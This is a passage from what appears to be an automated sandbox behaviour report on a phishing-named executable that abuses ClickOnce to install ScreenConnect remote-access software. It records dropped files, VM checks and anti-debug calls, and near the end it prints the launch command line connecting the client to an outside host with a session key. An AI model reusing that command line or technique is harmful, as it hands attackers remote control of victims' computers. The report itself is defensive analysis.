                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595702Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595474Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595238Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595050Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594934Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3179Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6488Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe TID: 5544Thread sleep count: 67 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe TID: 5544Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599653s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599544s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599309s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599061s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598451s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598108s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597932s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597777s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597665s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597560s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597124s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597014s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596905s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595702s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595474s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595238s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595050s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594934s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 4760Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe TID: 5772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe TID: 940Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A4A4B FindFirstFileExA,0_2_009A4A4B
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2983530978.0000025D396AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3288443325.0000016BA622B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3290214529.0000016BAB855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261874681.0000021CA1EDB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288165449.0000021CA1EDC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2120616150.0000021CA1EDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: svchost.exe, 00000007.00000002.3287628866.0000021CA1E41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.3286846873.0000000001211000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
                  Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000007.00000002.3289223236.0000021CA2E42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
                  Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A191F
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A3677 mov eax, dword ptr fs:[00000030h] 0_2_009A3677
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A6893 GetProcessHeap,0_2_009A6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009A1493
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A4573
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A1AAC SetUnhandledExceptionFilter,0_2_009A1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.2.dr, ClientService.cs Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\o0ajlz89.o67\32b9qcnc.lyy\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\o0ajlz89.o67\32b9qcnc.lyy\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
